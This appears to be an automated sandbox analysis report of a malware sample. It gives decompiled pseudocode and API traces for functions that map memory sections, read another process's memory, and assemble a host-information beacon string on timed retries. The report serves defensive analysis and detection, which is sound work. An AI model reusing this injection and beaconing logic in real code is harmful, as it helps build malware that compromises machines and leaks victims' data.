0x00b092df
0x00b0930e

APIs

NtCreateSection.NTDLL(?,000F001F,?,00000001,?,08000000,00000000,74E04EE0,00000000,00000000,00B048F6), ref: 00B092C6

Part of subcall function 00B094E8: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00B092DB,00000002,00000000,?,?,00000000,?,?,00B092DB,00000000), ref: 00B09515

memset.NTDLL ref: 00B092E8

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID:
API String ID: 2533685722-0
Opcode ID: b3993a454ad38d8c07d8128c2b29de1186af252740f548d47add59a4ceef0d82
Instruction ID: cd481625fcf1d40a666988e94a16668a4bde2e26c1fa1b8e73bd469a1caec3b5
Opcode Fuzzy Hash: b3993a454ad38d8c07d8128c2b29de1186af252740f548d47add59a4ceef0d82
Instruction Fuzzy Hash: 292108B6D00209AFDB11DFA9C8849EEFBF9FB48354F104469E616F3251D731AA448F64

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D103, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000000), ref: 00B6D12C
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,00B64659,00000000,00000000,00000028,00000100), ref: 00B6D14E

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: b34088776bb9551c254eab03ac49c2b91bbab3defb01c1362b4746d2c9beb005
Instruction ID: 6f59c567ed2fdc884bc60dddf2f58cb618e32911238056363fd650aaffd8b80f
Opcode Fuzzy Hash: b34088776bb9551c254eab03ac49c2b91bbab3defb01c1362b4746d2c9beb005
Instruction Fuzzy Hash: 5AF0F976A01109BFCB01CF99DC44C9ABBFDEB89710B144559F905D3230D671AA52DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1273, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E1A1273(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e1a1285
0x6e1a128b
0x6e1a1299
0x6e1a12a0
0x6e1a12a5
0x6e1a12ab
0x00000000
0x6e1a12ac
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,6E1A142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E1A142A,?), ref: 6E1A12A0

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 4beb7e19f00233e7bda22a3dd35f1702be6496a6a04d51938f2cc1735a6e626a
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 64F012B690020CBFEB119FA9CC85CAFBBBDEB44354F10493AB252E1090D6309E489A60

Uniqueness

Uniqueness Score: -1.00%

Function 00B094E8, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B094E8(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00b094fa
0x00b09500
0x00b0950e
0x00b09515
0x00b0951a
0x00b09520
0x00000000
0x00b09521
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00B092DB,00000002,00000000,?,?,00000000,?,?,00B092DB,00000000), ref: 00B09515

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 9db1fc4f1de2e34080575a3d8372718764e03e4722b04318413c19c4664ed06f
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 16F012B590020CBFDB119FA5CC85CAFBBFDEB44354B104979F152E1091D6309E089A60

Uniqueness

Uniqueness Score: -1.00%

Function 00B6F02A, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,00B81460), ref: 00B6F041

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 66ac68b85ed4879ba1a2073dbfd2cbfb764c379580aaf79106ee281bafcd88c8
Instruction ID: 7fa053323639b6efdbc1ccc7754e81affd10042ebd7c56536bed416a24a13eb9
Opcode Fuzzy Hash: 66ac68b85ed4879ba1a2073dbfd2cbfb764c379580aaf79106ee281bafcd88c8
Instruction Fuzzy Hash: 46F05E713001169F8720DF99DC84DABBBEDEB05B55B1041B4E904DB266E730ED45CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00B044A4, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00B044A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				void* _t57;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0xb0d018; // 0x6a85f48
				asm("bswap eax");
				_t27 =  *0xb0d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0xb0d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0xb0d00c; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0xb0d2e0; // 0xdca5a8
				_t3 = _t30 + 0xb0e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0xb0d02c,  *0xb0d004, _t25);
				_t33 = E00B05B60();
				_t34 =  *0xb0d2e0; // 0xdca5a8
				_t4 = _t34 + 0xb0e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E00B01BBF(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0xb0d2e0; // 0xdca5a8
					_t6 = _t83 + 0xb0e8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0xb0d270, 0, _t96);
				}
				_t97 = E00B0137A();
				if(_t97 != 0) {
					_t78 =  *0xb0d2e0; // 0xdca5a8
					_t8 = _t78 + 0xb0e8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0xb0d270, 0, _t97);
				}
				_t98 =  *0xb0d364; // 0x18d95b0
				_a32 = E00B03857(0xb0d00a, _t98 + 4);
				_t42 =  *0xb0d308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0xb0d2e0; // 0xdca5a8
					_t11 = _t74 + 0xb0e8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0xb0d304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0xb0d2e0; // 0xdca5a8
					_t13 = _t71 + 0xb0e885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0xb0d270, 0, 0x800);
					if(_t100 != 0) {
						E00B0A811(GetTickCount());
						_t50 =  *0xb0d364; // 0x18d95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0xb0d364; // 0x18d95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0xb0d364; // 0x18d95b0
						_t57 = E00B01974(1, _t95, _t105,  *_t56); // executed
						_t103 = _t57;
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0xb0c2ac);
							_push(_t103);
							_t62 = E00B038CA();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00B02A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E00B047D5();
								}
								RtlFreeHeap( *0xb0d270, 0, _v44); // executed
							}
							HeapFree( *0xb0d270, 0, _t103);
						}
						RtlFreeHeap( *0xb0d270, 0, _t100); // executed
					}
					HeapFree( *0xb0d270, 0, _a24);
				}
				RtlFreeHeap( *0xb0d270, 0, _t105); // executed
				return _a4;
			}

0x00b044a4
0x00b044a4
0x00b044a4
0x00b044a9
0x00b044af
0x00b044b9
0x00b044bb
0x00b044bb
0x00b044c8
0x00b044d3
0x00b044d6
0x00b044e1
0x00b044e4
0x00b044e9
0x00b044ec
0x00b044f1
0x00b044f4
0x00b04500
0x00b0450d
0x00b0450f
0x00b04515
0x00b0451a
0x00b04525
0x00b04527
0x00b0452a
0x00b0452c
0x00b04531
0x00b04535
0x00b04537
0x00b0453c
0x00b04548
0x00b0454a
0x00b04556
0x00b04558
0x00b04558
0x00b04563
0x00b04567
0x00b04569
0x00b0456e
0x00b0457a
0x00b0457c
0x00b04588
0x00b0458a
0x00b0458a
0x00b04590
0x00b045a3
0x00b045a7
0x00b045ae
0x00b045b1
0x00b045b6
0x00b045c1
0x00b045c3
0x00b045c6
0x00b045c6
0x00b045c8
0x00b045cf
0x00b045d2
0x00b045d7
0x00b045e1
0x00b045e3
0x00b045eb
0x00b04604
0x00b04608
0x00b04614
0x00b04619
0x00b04622
0x00b04633
0x00b04637
0x00b04640
0x00b04646
0x00b0464e
0x00b04653
0x00b04660
0x00b04666
0x00b04672
0x00b04678
0x00b04679
0x00b0467e
0x00b04684
0x00b0468a
0x00b04691
0x00b04698
0x00b0469e
0x00b046a5
0x00b046a9
0x00b046b4
0x00b046b9
0x00b046bf
0x00b046c8
0x00b046c8
0x00b046d9
0x00b046d9
0x00b046e8
0x00b046e8
0x00b046f7
0x00b046f7
0x00b04709
0x00b04709
0x00b04718
0x00b04729

APIs

GetTickCount.KERNEL32 ref: 00B044BB
wsprintfA.USER32 ref: 00B04508
wsprintfA.USER32 ref: 00B04525
wsprintfA.USER32 ref: 00B04548
HeapFree.KERNEL32(00000000,00000000), ref: 00B04558
wsprintfA.USER32 ref: 00B0457A
HeapFree.KERNEL32(00000000,00000000), ref: 00B0458A
wsprintfA.USER32 ref: 00B045C1
wsprintfA.USER32 ref: 00B045E1
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00B045FE
GetTickCount.KERNEL32 ref: 00B0460E
RtlEnterCriticalSection.NTDLL(018D9570), ref: 00B04622
RtlLeaveCriticalSection.NTDLL(018D9570), ref: 00B04640

Part of subcall function 00B01974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00B04653,?,018D95B0), ref: 00B0199F
Part of subcall function 00B01974: lstrlen.KERNEL32(?,?,?,00B04653,?,018D95B0), ref: 00B019A7
Part of subcall function 00B01974: strcpy.NTDLL ref: 00B019BE
Part of subcall function 00B01974: lstrcat.KERNEL32(00000000,?), ref: 00B019C9
Part of subcall function 00B01974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00B04653,?,018D95B0), ref: 00B019E6

StrTrimA.SHLWAPI(00000000,00B0C2AC,?,018D95B0), ref: 00B04672

Part of subcall function 00B038CA: lstrlen.KERNEL32(018D9AF0,00000000,00000000,7691C740,00B0467E,00000000), ref: 00B038DA
Part of subcall function 00B038CA: lstrlen.KERNEL32(?), ref: 00B038E2
Part of subcall function 00B038CA: lstrcpy.KERNEL32(00000000,018D9AF0), ref: 00B038F6
Part of subcall function 00B038CA: lstrcat.KERNEL32(00000000,?), ref: 00B03901

lstrcpy.KERNEL32(00000000,?), ref: 00B04691
lstrcpy.KERNEL32(00000000,00000000), ref: 00B04698
lstrcat.KERNEL32(00000000,?), ref: 00B046A5
lstrcat.KERNEL32(00000000,00000000), ref: 00B046A9
RtlFreeHeap.NTDLL(00000000,?,00000000,?,?), ref: 00B046D9
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B046E8
RtlFreeHeap.NTDLL(00000000,00000000,?,018D95B0), ref: 00B046F7
HeapFree.KERNEL32(00000000,00000000), ref: 00B04709
RtlFreeHeap.NTDLL(00000000,?), ref: 00B04718

Strings

Ut, xrefs: 00B04558, 00B0458A, 00B046D9, 00B046E8, 00B046F7, 00B04709, 00B04718

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
String ID: Ut
API String ID: 3963266935-8415677
Opcode ID: 4ff60660a5c16e3d2a481af86b8c5f8829d1ea68efbaffcfd07574ebd81e60b9
Instruction ID: a519215f5ccfedce5d7bad5ea6e991c7299d9f036723d7a16406f1b6b7563880
Opcode Fuzzy Hash: 4ff60660a5c16e3d2a481af86b8c5f8829d1ea68efbaffcfd07574ebd81e60b9
Instruction Fuzzy Hash: 01617B71500200AFD721ABA8ED49E6A3FE8FB58740F054558FA09D32F1EF35E906DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00B05461, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00B05461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				long _t67;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xb0d278);
					_v20 = 0;
					_v16 = 0;
					L00B0AED0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xb0d2a4; // 0x1f4
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xb0d284 = 5;
						} else {
							_t68 = E00B0502E(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xb0d298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00B0577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_t67 = E00B02107(_t72, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t67;
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xb0d27c);
							goto L21;
						} else {
							__eflags =  *0xb0d280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00B047D5();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xb0d280);
								L21:
								L00B0AED0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0xb0d270, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00b05461
0x00b05473
0x00b05476
0x00b05482
0x00b05488
0x00b0548d
0x00b055f4
0x00b05493
0x00b05493
0x00b05495
0x00b0549a
0x00b0549b
0x00b054a1
0x00b054a4
0x00b054a7
0x00b054b5
0x00b054c0
0x00b054c3
0x00b054c5
0x00b054d2
0x00b054dc
0x00b054de
0x00b054e3
0x00b054e8
0x00b054f3
0x00b054f3
0x00b054ea
0x00b054ea
0x00b054f1
0x00000000
0x00000000
0x00b054f1
0x00b054fd
0x00000000
0x00b05500
0x00b05504
0x00b0550f
0x00b0550f
0x00b05516
0x00b0551f
0x00b05526
0x00b0552f
0x00b05532
0x00b05535
0x00b0553a
0x00b0553f
0x00000000
0x00000000
0x00b05541
0x00b05544
0x00b05547
0x00b0554a
0x00000000
0x00b0554c
0x00b05556
0x00b0555b
0x00b0555b
0x00000000
0x00b05589
0x00b05589
0x00b0558e
0x00b055ad
0x00b055af
0x00b055b4
0x00b055b5
0x00000000
0x00b05590
0x00b05590
0x00b05596
0x00000000
0x00b05598
0x00b05598
0x00b0559d
0x00b0559f
0x00b055a4
0x00b055a5
0x00b055bb
0x00b055bb
0x00b055c3
0x00b055ce
0x00b055d1
0x00b055dc
0x00b055de
0x00b055e1
0x00b055e3
0x00000000
0x00b055e9
0x00000000
0x00b055e9
0x00b055e3
0x00b05596
0x00000000
0x00b0558e
0x00b0555e
0x00b05560
0x00b05563
0x00b05564
0x00b05564
0x00b05568
0x00b05572
0x00b05572
0x00b05578
0x00b0557b
0x00b0557b
0x00b05581
0x00b05581
0x00b055fe
0x00000000

APIs

memset.NTDLL ref: 00B05476
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00B05482
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B054A7
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00B054C3
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B054DC
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00B05572
CloseHandle.KERNEL32(?), ref: 00B05581
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00B055BB
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00B053C9,?), ref: 00B055D1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B055DC

Part of subcall function 00B0502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,018D9370,00000000,?,74E5F710,00000000,74E5F730), ref: 00B0507D
Part of subcall function 00B0502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,018D93A8,?,00000000,30314549,00000014,004F0053,018D9364), ref: 00B0511A
Part of subcall function 00B0502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00B054EF), ref: 00B0512C

GetLastError.KERNEL32 ref: 00B055EE

Strings

@MtNt, xrefs: 00B055EE
Ut, xrefs: 00B05572

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Ut$@MtNt
API String ID: 3521023985-969920318
Opcode ID: f954f134ccf64ae10f6cd70146657dd2aed6ac8b2bc2b137c7410c162545750f
Instruction ID: 6e587c1d8b15300dc36bf612383dfeafcd2143d2d93afe0c71fb11d46a198831
Opcode Fuzzy Hash: f954f134ccf64ae10f6cd70146657dd2aed6ac8b2bc2b137c7410c162545750f
Instruction Fuzzy Hash: 4E513AB1801228EBDF219F94DC44AEFBFB9EF19720F204656F415A25D0D7709A44DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B03598, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00B03598(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00B0AECA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xb0d2e0; // 0xdca5a8
				_t5 = _t13 + 0xb0e876; // 0x18d8e1e
				_t6 = _t13 + 0xb0e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00B0ABEA();
				_t17 = CreateFileMappingW(0xffffffff, 0xb0d2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00b03598
0x00b035a0
0x00b035a4
0x00b035aa
0x00b035af
0x00b035b4
0x00b035b7
0x00b035ba
0x00b035bf
0x00b035c0
0x00b035c3
0x00b035c8
0x00b035cf
0x00b035d9
0x00b035db
0x00b035dc
0x00b035df
0x00b035fb
0x00b03601
0x00b03605
0x00b03653
0x00b03607
0x00b03614
0x00b03624
0x00b0362c
0x00b0363e
0x00b03642
0x00000000
0x00000000
0x00b0362e
0x00b03631
0x00b03636
0x00b03638
0x00b03638
0x00b03616
0x00b03618
0x00b03644
0x00b03645
0x00b03645
0x00b03614
0x00b0365a

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00B0529C,?,?,4D283A53,?,?), ref: 00B035A4
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00B035BA
_snwprintf.NTDLL ref: 00B035DF
CreateFileMappingW.KERNELBASE(000000FF,00B0D2E4,00000004,00000000,00001000,?), ref: 00B035FB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00B0529C,?,?,4D283A53), ref: 00B0360D
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00B03624
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B0529C,?,?), ref: 00B03645
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00B0529C,?,?,4D283A53), ref: 00B0364D

Strings

@MtNt, xrefs: 00B0364D

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MtNt
API String ID: 1814172918-3251738875
Opcode ID: 45cecd3e57fc24bce61863f1bb982cae22ea06d27141ce192ce9dca7810ede8b
Instruction ID: 02bb7f94590ced7b2f00c0fb6e55cae84f5b8efc21630e31035f30e92241c0ba
Opcode Fuzzy Hash: 45cecd3e57fc24bce61863f1bb982cae22ea06d27141ce192ce9dca7810ede8b
Instruction Fuzzy Hash: F121CD72A00204BBC711ABA8CC49F9E7FEDEB54B44F2541A5F606E72D0EB71DA05CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B01000, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00B01000(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00B04837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00B0A938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xb0d298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xb0d2e0; // 0xdca5a8
